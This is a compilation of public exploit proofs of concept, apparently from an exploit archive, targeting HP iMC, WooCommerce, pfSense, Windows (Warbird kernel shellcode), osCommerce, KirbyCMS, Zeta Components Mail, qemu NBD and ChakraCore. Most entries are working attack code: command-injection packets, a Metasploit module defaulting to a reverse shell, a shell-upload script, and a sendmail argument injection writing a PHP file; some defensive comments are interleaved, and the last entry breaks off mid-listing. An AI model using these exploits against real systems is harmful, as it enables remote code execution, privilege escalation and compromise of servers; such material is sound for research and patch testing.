#!/opt/local/bin/python2.7
# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE
# Date: 11-29-2017
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.2 (E0403) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5816
# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-340/
# note that this PoC will create a file 'C:\10008.txt'
from pyasn1.type.univ import *
from pyasn1.type.namedtype import *
from pyasn1.codec.ber import encoder
import struct
import binascii
import socket, sys
# PoC for CVE-2017-5816: sends one dbman message (opcode 10008) whose
# dbInstance field carries an injected command.
# Defender notes, from this listing only:
# - nothing below authenticates before sending, so reachability of the dbman
#   port is the only precondition visible here; restrict it to management hosts;
# - the marker file named in the header comment (C:\10008.txt) is the artefact
#   this PoC leaves behind.
# Lab target address and dbman TCP port, as published.
ip = '192.168.1.74'
port = 2810
# Benign marker command: redirects the output of whoami into C:\10008.txt.
payload = "whoami > C:\\10008.txt"
# Message type placed in the packet header (10008, per the exploit title).
opcode = 10008
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
# ASN.1 SEQUENCE with the six fields this PoC sends for the opcode.
class DbmanMsg(Sequence):
componentType = NamedTypes(
NamedType('dbIp', OctetString()),
NamedType('iDBType', Integer()),
NamedType('dbInstance', OctetString()),
NamedType('dbSaUserName', OctetString()),
NamedType('dbSaPassword', OctetString()),
NamedType('strOraDbIns', OctetString())
)
msg = DbmanMsg()
msg['dbIp'] = ip
msg['iDBType'] = 4
# Injection point: the value closes a double quote and chains the command with
# '&'. That this has any effect implies the service puts dbInstance into a
# command line without escaping it; the fix is server-side (vendor patch for
# the CVE in the header).
msg['dbInstance'] = "a\"& " + payload + " &"
# The remaining fields are single-character placeholders.
msg['dbSaUserName'] = "b"
msg['dbSaPassword'] = "c"
msg['strOraDbIns'] = "d"
# Definite-length BER encoding of the SEQUENCE.
encodedMsg = encoder.encode(msg, defMode=True)
msgLen = len(encodedMsg)
# Wire format: big-endian int32 opcode, int32 length, then the BER blob.
values = (opcode, msgLen, encodedMsg)
s = struct.Struct(">ii%ds" % msgLen)
packed_data = s.pack(*values)
# Fire-and-forget: no reply is read before the socket is closed.
sock.send(packed_data)
sock.close()
#!/usr/bin/python
# Build one oversized playlist entry: the URL scheme followed by 1500 filler bytes.
buffer = b"".join((b"http://", b"\x41" * 1500))

# Binary mode keeps the bytes on disk exactly as built.
with open("player.m3u", "wb") as f:
    f.write(buffer)
# Exploit Title: WordPress woocommerce directory traversal
# Date: 28-11-2017
# Software Link: https://wordpress.org/plugins/woocommerce/
# Exploit Author:fu2x2000
# Contact: fu2x2000@gmail.com
# Website:
# CVE:2017-17058
#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0
# Category: webapps
1. Description
Identifying whether the WooCommerce theme plugin is properly sanitized against
directory traversal; even the latest version of WordPress with WooCommerce can be
vulnerable.
2. Proof of Concept
$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
// Fetch $fn with an HTTP GET, sending a UTF-8 Content-Type request header,
// and return whatever file_get_contents() returns (the body, or false on failure).
// The leading @ suppresses PHP warnings, so a failed request produces no message.
function file_get_contents_utf8($fn) {
// Stream-context options for the http wrapper: method and one request header.
$opts = array(
'http' => array(
'method'=>"GET",
'header'=>"Content-Type: text/html; charset=utf-8"
)
);
$wp = stream_context_create($opts);
$result = @file_get_contents($fn,false,$wp);
return $result;
}
// Requests the path held in $woo over HTTP and echoes the response unchanged.
// NOTE(review): this only returns content if the web server serves that plugin
// template directory directly (for example with directory listings enabled) —
// presumably the exposure being demonstrated; confirm against the target's
// configuration. Disabling directory listings and denying direct web access to
// plugin template directories closes it.
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");
$result = file_get_contents_utf8("http://".$woo);
echo $result;
Regards
Fu2x200
#!/opt/local/bin/python2.7
# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10007 Command Injection RCE
# Date: 11-28-2017
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.2 (E0403) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5817
# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-341/
# note that this PoC will create a file 'C:\poc.txt'
import socket, sys
# PoC for CVE-2017-5817: one hand-assembled dbman message (opcode 10007) with a
# command injected into one of its string fields.
# Defender notes, from this listing only: no authentication step precedes the
# send, so access to the dbman port should be restricted; the marker file named
# in the header comment (C:\poc.txt) is the artefact this PoC leaves behind.
ip = '192.168.1.74'
port = 2810
command = "echo PoC 12345 > C:\\poc.txt" # command to run
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
# Header: big-endian opcode 0x00002717 (= 10007), then the three high bytes of
# the length field.
buf = "\x00\x00\x27\x17\x00\x00\x00"
# Low byte of the length; all lengths here are single bytes derived from
# len(command), so the layout assumes a short command.
buf += chr(109 + 10 + len(command))
# BER SEQUENCE tag (0x30) with a long-form, one-byte length (0x81).
buf += "\x30\x81"
buf += chr(109 + 7 + len(command))
# OCTET STRING of length 0x0c holding the 12-character ip string above.
buf += "\x04\x0c"
buf += ip
# Fixed filler fields (AAAA, BBBB, CCCC, two small integers, "MANUAL", DDDD)
# ending on the tag byte of the next OCTET STRING.
buf += ("\x04\x04\x41\x41\x41\x41\x04"
"\x04\x42\x42\x42\x42\x04\x04\x43\x43\x43\x43\x02\x01\x01\x02\x01"
"\x03\x04\x06\x4d\x41\x4e\x55\x41\x4c\x04\x04\x44\x44\x44\x44\x04")
# Length of the injected field: 5 prefix bytes + command + 2 suffix bytes.
buf += chr(len(command) + 7)
# Injection point: the field reads  sa"& <command> &  — the double quote closes
# the value and '&' chains the command. That this works implies the service
# builds a command line from the field without escaping; the fix is server-side.
buf += "\x73\x61\x22\x26\x20"
buf += command
# Closing ' &' followed by the remaining fixed fields ("password", "instance",
# further four-byte fillers, an empty SEQUENCE and a final integer).
buf += ("\x20\x26\x04\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x04"
"\x04\x00\x00\x04\x57\x04\x08\x69\x6e\x73\x74\x61\x6e\x63\x65\x04"
"\x04\x45\x45\x45\x45\x04\x04\x46\x46\x46\x46\x04\x04\x47\x47\x47"
"\x47\x04\x04\x48\x48\x48\x48\x30\x00\x02\x01\x01")
# Fire-and-forget: no reply is read before the socket is closed.
sock.send(buf)
sock.close()
Introduced in commit f37708f6b8 (2.10). The NBD spec says a client
can request export names up to 4096 bytes in length, even though
they should not expect success on names longer than 256. However,
qemu hard-codes the limit of 256, and fails to filter out a client
that probes for a longer name; the result is a stack smash that can
potentially give an attacker arbitrary control over the qemu
process.
The smash can be easily demonstrated with this client:
$ qemu-io f raw nbd://localhost:10809/$(printf %3000d 1 | tr ' ' a)
If the qemu NBD server binary (whether the standalone qemu-nbd, or
the builtin server of QMP nbd-server-start) was compiled with
-fstack-protector-strong, the ability to exploit the stack smash
into arbitrary execution is a lot more difficult (but still
theoretically possible to a determined attacker, perhaps in
combination with other CVEs). Still, crashing a running qemu (and
losing the VM) is bad enough, even if the attacker did not obtain
full execution control.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for the post-authentication command injection in pfSense's
# system_groupmanager.php (see the Description and the advisory URL below).
#
# Defender notes, all taken from this listing:
# - a valid web GUI login is required; the option defaults registered below are
#   admin / pfsense, so unchanged default credentials are the easy way in;
# - the payload travels in the 'members[]' POST field of a group-creation request;
# - a run leaves a group with a random 10-letter name behind (see #exploit),
#   which is a usable indicator when auditing a firewall's group list.
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
# Registers the module metadata and the USERNAME / PASSWORD / RPORT options.
def initialize(info = {})
super(
update_info(
info,
'Name' => 'pfSense authenticated group member RCE',
'Description' => %q(
pfSense, a free BSD based open source firewall distribution,
version <= 2.3.1_1 contains a remote command execution
vulnerability post authentication in the system_groupmanager.php page.
Verified against 2.2.6 and 2.3.
),
'Author' =>
[
's4squatch', # discovery
'h00die' # module
],
'References' =>
[
[ 'EDB', '43128' ],
[ 'URL', 'https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'PAYLOAD' => 'cmd/unix/reverse_openssl'
},
'Arch' => [ ARCH_CMD ],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl openssl'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 06 2017'
)
)
register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'pfsense']),
Opt::RPORT(443)
], self.class
)
end
# Logs in to the web GUI and returns the session cookies.
# Flow: GET /index.php, read the csrfMagicToken from the page, POST the
# credentials with that token; a 302 response is treated as success.
# Every failure path ends in fail_with.
def login
res = send_request_cgi(
'uri' => '/index.php',
'method' => 'GET'
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
# The named capture makes `csrf` a local variable; it is nil when the page has no token.
/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_status("CSRF Token for login: #{csrf}")
res = send_request_cgi(
'uri' => '/index.php',
'method' => 'POST',
'vars_post' => {
'__csrf_magic' => csrf,
'usernamefld' => datastore['USERNAME'],
'passwordfld' => datastore['PASSWORD'],
'login' => ''
}
)
unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")
end
if res.code == 302
vprint_status('Successful Authentication')
return res.get_cookies
else
# NOTE(review): this message puts the password in clear text into the failure output.
fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
return nil
end
end
# Requests /index.php with the session cookie and parses the version string
# from the page. Returns a Gem::Version; '0.0' when no version could be read.
def detect_version(cookie)
res = send_request_cgi(
'uri' => '/index.php',
'method' => 'GET',
'cookie' => cookie
)
unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")
end
/Version.+<strong>(?<version>[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body
if version
print_status("pfSense Version Detected: #{version}")
return Gem::Version.new(version)
end
# If the device isn't fully setup, you get stuck at redirects to wizard.php
# however, this does NOT stop exploitation strangely
print_error("pfSens Version Not Detected or wizard still enabled.")
Gem::Version.new('0.0')
end
# Returns Detected when /index.php contains 'Login to pfSense', Safe otherwise.
# This only recognises the product's login page; it does not test the version
# or the flaw itself, so Detected is not evidence of vulnerability.
def check
begin
res = send_request_cgi(
'uri' => '/index.php',
'method' => 'GET'
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
if /Login to pfSense/ =~ res.body
Exploit::CheckCode::Detected
else
Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
# Logs in, reads the version, fetches a CSRF token from the group-manager
# "new" form, then POSTs a new group whose 'members[]' value carries the payload.
def exploit
begin
cookie = login
version = detect_version(cookie)
vprint_good('Login Successful')
res = send_request_cgi(
'uri' => '/system_groupmanager.php',
'method' => 'GET',
'cookie' => cookie,
'vars_get' => {
'act' => 'new'
}
)
/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_status("CSRF Token for group creation: #{csrf}")
# Random group name; it is what remains on the firewall after a run.
group_name = rand_text_alpha(10)
post_vars = {
'__csrf_magic' => csrf,
'groupname' => group_name,
'description' => '',
# Injection point: the member id is closed with a quote and the command sits
# between ';' separators. That this works implies the value reaches a shell
# command unescaped on the server; the fix is the vendor advisory referenced above.
'members[]' => "0';#{payload.encoded};'",
'groupid' => '',
'save' => 'Save'
}
# The extra form fields differ by version: 'gtype' => 'local' from 2.3 on,
# empty act/gtype/privid otherwise.
if version >= Gem::Version.new('2.3')
post_vars = post_vars.merge('gtype' => 'local')
elsif version <= Gem::Version.new('2.3') # catch for 2.2.6. left this elsif for easy expansion to other versions as needed
post_vars = post_vars.merge(
'act' => '',
'gtype' => '',
'privid' => ''
)
end
send_request_cgi(
'uri' => '/system_groupmanager.php',
'method' => 'POST',
'cookie' => cookie,
'vars_post' => post_vars,
'vars_get' => {
'act' => 'edit'
}
)
# The module does not delete the group it created.
print_status("Manual removal of group #{group_name} is required.")
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
/*
EDB Note
Source ~ https://gist.github.com/xpn/736daa4d1ff7b9869f4b3d1e9a34d315/ff2e2465d4a07588d0148dc87e77b17b41ef9d1d
Source ~ https://blog.xpnsec.com/windows-warbird-privesc/
Source ~ https://github.com/xpn/warbird_exploit
Ref ~ https://bugs.chromium.org/p/project-zero/issues/detail?id=1391
*/
// Shellcode to be executed by exploit
const char shellcode[256] = {
0xc7, 0x43, 0x04, 0x00, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x0c,
0x00, 0x00, 0x00, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5f,
0x5e, 0x5b, 0x89, 0xec, 0x5d, 0x81, 0xc4, 0x0c, 0x00, 0x00,
0x00, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5e, 0x5b, 0x5f,
0x89, 0xec, 0x5d, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x81,
0xc4, 0x04, 0x00, 0x00, 0x00, 0x5f, 0x5e, 0x5b, 0x89, 0xec,
0x5d, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x04,
0x00, 0x00, 0x00, 0x5f, 0x5f, 0x5e, 0x5b, 0x89, 0xec, 0x5d,
0x60, 0x64, 0xa1, 0x24, 0x01, 0x00, 0x00, 0xc7, 0x80, 0x3e,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xe8,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xec,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf0,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf4,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf8,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xfc,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x50,
0x01, 0x00, 0x00, 0x81, 0xb8, 0x7c, 0x01, 0x00, 0x00, 0x63,
0x6d, 0x64, 0x2e, 0x74, 0x0d, 0x8b, 0x80, 0xb8, 0x00, 0x00,
0x00, 0x2d, 0xb8, 0x00, 0x00, 0x00, 0xeb, 0xe7, 0x89, 0xc3,
0x81, 0xb8, 0xb4, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0x74, 0x0d, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x2d, 0xb8,
0x00, 0x00, 0x00, 0xeb, 0xe7, 0x8b, 0x88, 0xfc, 0x00, 0x00,
0x00, 0x89, 0x8b, 0xfc, 0x00, 0x00, 0x00, 0x61, 0xc3, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};
// Calls NtQuerySystemInformation with information class 185 on a zeroed 8-byte
// buffer, copies the 256-byte shellcode array to address 0, then repeats the call.
// Return values of both calls are ignored.
// NOTE(review): class 185 is not named in this listing; the links in the EDB
// note above point to the Warbird write-up and Project Zero issue 1391 — confirm
// the semantics there.
// Defender note: the copy to NULL can only succeed if page zero is mapped in the
// calling process, and nothing in this function maps it. Configurations that
// refuse user-mode mappings of page zero remove that step; the kernel-side fix
// is the vendor patch for the referenced issue.
void exploit(void) {
BYTE Buffer[8];
DWORD BytesReturned;
RtlZeroMemory(Buffer, sizeof(Buffer));
NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned);
// Copy our shellcode to the NULL page
RtlCopyMemory(NULL, shellcode, 256);
RtlZeroMemory(Buffer, sizeof(Buffer));
NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned);
}
// DLL entry point. All four notification reasons fall through to the same case,
// so exploit() runs on process attach and detach and on every thread
// attach/detach, not only when the DLL is first loaded.
// Always returns TRUE to the loader; hModule and lpReserved are unused.
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
exploit();
break;
}
return TRUE;
}
# Exploit Title: osCommerce 2.3.4.1 Authenticated Arbitrary File Upload
# Date: 11.11.2017
# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
# Vendor Homepage: https://www.oscommerce.com/
# Software Link: https://www.oscommerce.com/Products&Download=oscom234
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows
"""
osCommerce does by default not allow Users to upload arbitrary files from the Admin Panel. However, any user
being privileged enough to send newsletters can exploit an object injection in the osCommerce core to
upload any file, allowing the user to gain shell access. The user does not need to be an administrator,
any account with access to the newsletters will do.
More details can be found here:
https://scannell-infosec.net/uploading-a-shell-from-within-the-oscommerce-admin-panel-via-object-injection/
"""
import urlparse
import argparse
import sys
import requests
DEFAULT_ADMIN_URL = "/catalog/admin/"
DEFAULT_NEWSLETTER_SCRIPT = "/catalog/admin/newsletters.php"
# Builds an authenticated session and returns it if it was successful
def authenticate(username, password, url):
    """Log in to the osCommerce admin area and return the session.

    Returns the ``requests.Session`` when the login POST is answered with a
    302 redirect, otherwise ``False``.
    """
    login_url = url + "login.php"
    http = requests.Session()
    # The first request only seeds the session cookie; redirects are not followed.
    http.get(login_url, allow_redirects=False)
    response = http.post(
        login_url,
        data={"username": username, "password": password},
        params={'action': "process"},
        allow_redirects=False,
    )
    if response.status_code != 302:
        return False
    return http
# Drives the newsletter workflow (new -> insert -> lock -> send) with an
# authenticated session and attaches local_filename to the final request.
# Defender notes, from this listing only:
# - the sequence of newsletters.php requests with action=insert, lock and send,
#   the last one a multipart upload, is the observable pattern in admin logs;
# - the file is then requested at url + local_filename, i.e. inside the admin
#   path, so new files appearing in that directory are an indicator;
# - per the module docstring, any account allowed to send newsletters is enough,
#   so that privilege should be granted as narrowly as full admin rights.
def upload_file(local_filename, session, url):
newsletter_script = url + "newsletters.php"
r = session.get(newsletter_script, params={"action": "new"})
# Newsletter fields sent with action=insert. NOTE(review): how 'module' and
# 'content' are interpreted server-side is not visible here; the docstring's
# linked write-up attributes the upload to an object injection — confirm there.
payload = {
'module': 'upload',
'title': 'uploaded_fname',
'content': './'
}
# Create the vulnerable newsletter and grab its ID
r = session.post(newsletter_script, params={"action": "insert"}, data=payload, allow_redirects=False)
try:
# Drops the first four characters of the redirect's query string
# (presumably "nID=" — verify against a real response).
newsletter_id = urlparse.urlparse(r.headers['Location']).query[4:]
print "[+] Successfully prepared the exploit and created a new newsletter with nID %s" % (newsletter_id)
# NOTE(review): bare except — any error, not only a missing Location header, ends here.
except:
print "[-] The script wasn't able to create a new newsletter"
exit(1)
# Now lock the newsletter
r = session.post(newsletter_script, params={"action": "lock", "nID": newsletter_id})
print "[+] Successfully locked the newsletter. Now attempting to upload.."
# Send the final request, containing the file!
# NOTE(review): the file is opened in text mode and never closed.
files = {
'uploaded_fname': open(local_filename)
}
r = session.post(newsletter_script, params={"action": "send", "nID": newsletter_id}, files=files)
print "[*] Now trying to verify that the file %s uploaded.." % (local_filename)
shell_url = url + local_filename
# Unauthenticated GET (plain requests, not the session).
r = requests.get(shell_url)
# NOTE(review): r.status_code is never checked, so the "HTTP 200" line is
# printed regardless of what the server answered.
print "[+] Got a HTTP 200 Reply for the uploaded file!"
print "[+] The uploaded file should now be available at %s" % (shell_url)
# Main Routine starts here
# Command-line entry: parse arguments, build the admin URL, log in, upload.
usage = " %s -u TARGET_URL -a AUTH -f FILE [-p ADMIN_PATH]\n\n" \
"Example: %s -u http://localhost/path/to/osCommerce --auth=admin:admin_password -f shell.php\n\n" \
"NOTE: For a more detailed description on the arguments use the -h switch\n\n\n" % (sys.argv[0], sys.argv[0])
parser = argparse.ArgumentParser(description='\n\nosCommerce 2.3.4 Authenticated Arbitrary File Upload', usage=usage)
parser.add_argument('-u', '--target-url', help='The target URL, including the path to the osCommerce installation (can also be document root /)', required=True)
# NOTE(review): credentials passed on the command line are visible in the
# process list and shell history of the machine running the script.
parser.add_argument('-a', '--auth', help='Credentials for a privileged user in the format of username:password', required=True)
parser.add_argument('-f', '--file', help="The local file to be uploaded to the vulnerable webhost", required=True)
parser.add_argument('-p', '--admin-path', help="The path for the osCommerce Admin Area. This defaults to /catalog/admin/", required=False)
args = parser.parse_args()
# Parse username and password
# NOTE(review): only the first two ':'-separated parts are used, so a password
# containing ':' is cut short, and a value without ':' raises IndexError.
username = args.auth.split(":")[0]
password = args.auth.split(":")[1]
url = args.target_url
# If the user hasn't passed a path to the osCommerce Admin Panel, use the default
if not args.admin_path:
url += DEFAULT_ADMIN_URL
else:
url += args.admin_path
# Authenticate the user and establish the connection
# authenticate() returns the session on success and False otherwise.
session = authenticate(username, password, url)
if not session:
print "[-] The script wasn't able to authenticate itself to osCommerce. Are you sure that the credentials are correct? Is %s the Admin Path?" % (url + "login.php")
exit(1)
else:
print "[+] Authentication successful"
upload_file(args.file, session, url)
# Exploit Title: KirbyCMS <2.5.7 Stored Cross Site Scripting
# Vendor Homepage: https://getkirby.com/
# Software Link: https://getkirby.com/try
# Discovered by: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# Platform: PHP
# CVE: CVE-2017-16807
1. Description
A cross-site Scripting (XSS) vulnerability in Kirby Panel before 2.3.3, 2.4.x before 2.4.2, and 2.5.x before 2.5.7 exists when displaying a specially prepared SVG document that has been uploaded as a content file.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16807
2. Proof of Concept
Steps to Reproduce:
Log in as an Editor and click on Site Options
Add the malicious .svg file which contains the javascript to the Site
Login to another browser with Admin Credentials.
Click on Site Options.
Click on the newly added .svg file
3. Reference
https://securityprince.blogspot.in/2017/11/cve-2017-16807-kirby-cms-257-cross-site.html
https://getkirby.com/changelog/kirby-2-5-7
4. Solution
The vulnerability is patched by the vendor in the version 2.5.7.
Vendor: Zeta Components
module: Mail, <= 1.8.1
Published: November 12th, 2017
Reported by: Kay
CVE-2017-15806
Overview
Zeta Components are a high quality, general purpose library of loosely coupled components for development of applications based on PHP 5. An issue was discovered in the Mail package for Zeta Components. It’s possible to exploit this vulnerability to execute arbitrary shell commands on the remote server.
Detail
This vulnerability is on send method in ezcMailMtaTransport class.
In /src/transports/mta/mta_transport.php at line 73, send() method use PHP mail() method to deliver email, while PHP use sendmail as default MTA. When mail() method is called, the 5th parameter is $additionalParameters , this parameter can pass extra param to sendmail. As the code shown, it is assigned by this line:
$additionalParameters = "-f{$mail->returnPath->email}";
If attacker assign email address like:
'kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'
and inject payload in mail body, sendmail will transfer log(-X) into /var/www/html/cache/exploit.php. The resulting file will contain the payload passed in the body of the email, that can then be accessed and run through domainname/cache/exploit.php.
To summarize, it is possible if all of these conditions are true:
- you use the ezcMailMtaTransport
- your “sendmail” binary allows the -X flag to be set, which is not the case for exim4 and postfix, as they don’t support that argument
- your wwwroot is writable by the user your webserver is running as
- the input to use for the ezcMailAddress that is assigned to the returnPath property is not properly escaped
PoC
// Minimal reproduction of the returnPath argument injection described above.
// The return-path address contains a space followed by -X<path>; because send()
// places returnPath->email directly after -f in the fifth mail() argument,
// sendmail receives -X as a separate option and logs the message, body
// included, to that path.
// Remediation given on this page: upgrade Mail to 1.8.2. Application code should
// also reject return-path values containing whitespace before assigning them.
use Mail\mail;
$mail = new ezcMail();
$mail->returnPath = new ezcMailAddress('kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php');
$mail->addTo( new ezcMailAddress('some one'));
$mail->subject = "Mail PoC Exploit";
// The body is what ends up in the log file; here it is a harmless phpinfo() call.
$mail->body = new ezcMailText("<?php phpinfo(); ?>");
$transport = new ezcMailMtaTransport();
$transport->send($mail);
Remediation
Upgrade Mail to 1.8.2
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1357
function opt(a, b, v) {
if (b.length < 1)
return;
for (let i = 0; i < a.length; i++)
a[i] = v;
b[0] = 2.3023e-320;
}
The above JavaScript code is JITed as follows:
... CHECKING THE TYPE OF B ...
OP_Memset(a, v, a.length);
b[0] = 2.3023e-320;
But there's no ImplicitCallFlags checks around OP_Memset. So it fails to detect if the type of "b" was changed after the "OP_Memset" called.
The PoC shows that it can result in type confusion.
PoC:
*/
// JIT target. Per the analysis in the comment above, the fill loop is compiled
// to a single OP_Memset and the type of `b` is checked only before it, with no
// ImplicitCallFlags check afterwards. A side effect that runs while `v` is
// converted can therefore change `b` without the compiled code noticing.
// The exact statement shape matters for the trigger; do not restructure.
function opt(a, b, v) {
if (b.length < 1)
return;
// Fill loop — the part the analysis says becomes OP_Memset(a, v, a.length).
for (let i = 0; i < a.length; i++)
a[i] = v;
// Store emitted on the assumption that `b` still has the type checked earlier.
b[0] = 2.3023e-320;
}
// Driver for the PoC: 1000 calls with plain arguments (presumably to get opt()
// JIT-compiled), then one call whose `v` has a valueOf() side effect.
function main() {
for (let i = 0; i < 1000; i++) {
opt(new Uint8Array(100), [1.1, 2.2, 3.3], {});
}
let a = new Uint8Array(100);
let b = [1.1, 2.2, 3.3];
opt(a, b, {
// Runs during the fill; storing an object into b changes the array's type
// after opt() has already checked it.
valueOf: () => {
b[0] = {};
return 0;
}
});
// Reads the slot written after the unchecked type change (the type confusion).
print(b[0]);
}
main();
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1343
Here's a snippet of the method.
void Lowerer::LowerBoundCheck(IR::Instr *const instr)
{
...
if(rightOpnd->IsIntConstOpnd())
{
IntConstType newOffset;
if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)
{
offset = newOffset;
rightOpnd = nullptr;
offsetOpnd = nullptr;
}
}
...
if(!rightOpnd)
{
rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);
}
}
At (a), it uses "IntConstMath::Add" to check integer overflow. But the size of IntConstType equals to the size of pointer, and the "offset" variable is used as a 32-bit integer. So it may fail to check integer overflow on 64-bit system.
PoC:
*/
// Writes through a 0x1000-element Uint32Array with a pre-incremented index that
// runs up to 0x7fffffff. Per the note above, the lowered bounds check adds the
// constant offset using pointer-width overflow detection while the offset is
// used as a 32-bit value, so the overflow can go undetected on 64-bit builds.
// The loop shape is the trigger; do not restructure.
function f() {
let arr = new Uint32Array(0x1000);
for (let i = 0; i < 0x7fffffff;) {
arr[++i] = 0x1234;
}
}
f();
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1341&desc=3
Let's start with a switch statement and its IR code for JIT.
JS:
for (let i = 0; i < 100; i++) {
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
}
IRs before Type Specialization:
s26.var = Ld_A s24.var - "i" #0011 Bailout: #0011 (BailOutExpectingInteger)
BrLt_A $L2, s26.var, s5.var #0070
$L9: #0070
BrGt_A $L2, s26.var, s23.var #0070
$L8: #0070
s28.var = Sub_A s26.var, 2 (0x2).i32 #0070 // Because of the minimum case is 2, subtracting 2 from i. s28 is a temporary variable.
MultiBr ..., s28.var #0070
IRs after Type Specialization:
s52(s26).i32 = Ld_A s51(s24).i32 - "i" #0011
BrLt_I4 $L2, s51(s24).i32, 2 (0x2).i32 #0070
$L9: #0070
BrGt_I4 $L2, s51(s24).i32, 38 (0x26).i32 #0070
$L8: #0070
s53(s28).i32 = Sub_I4 s51(s24).i32, 2 (0x2).i32 #0070
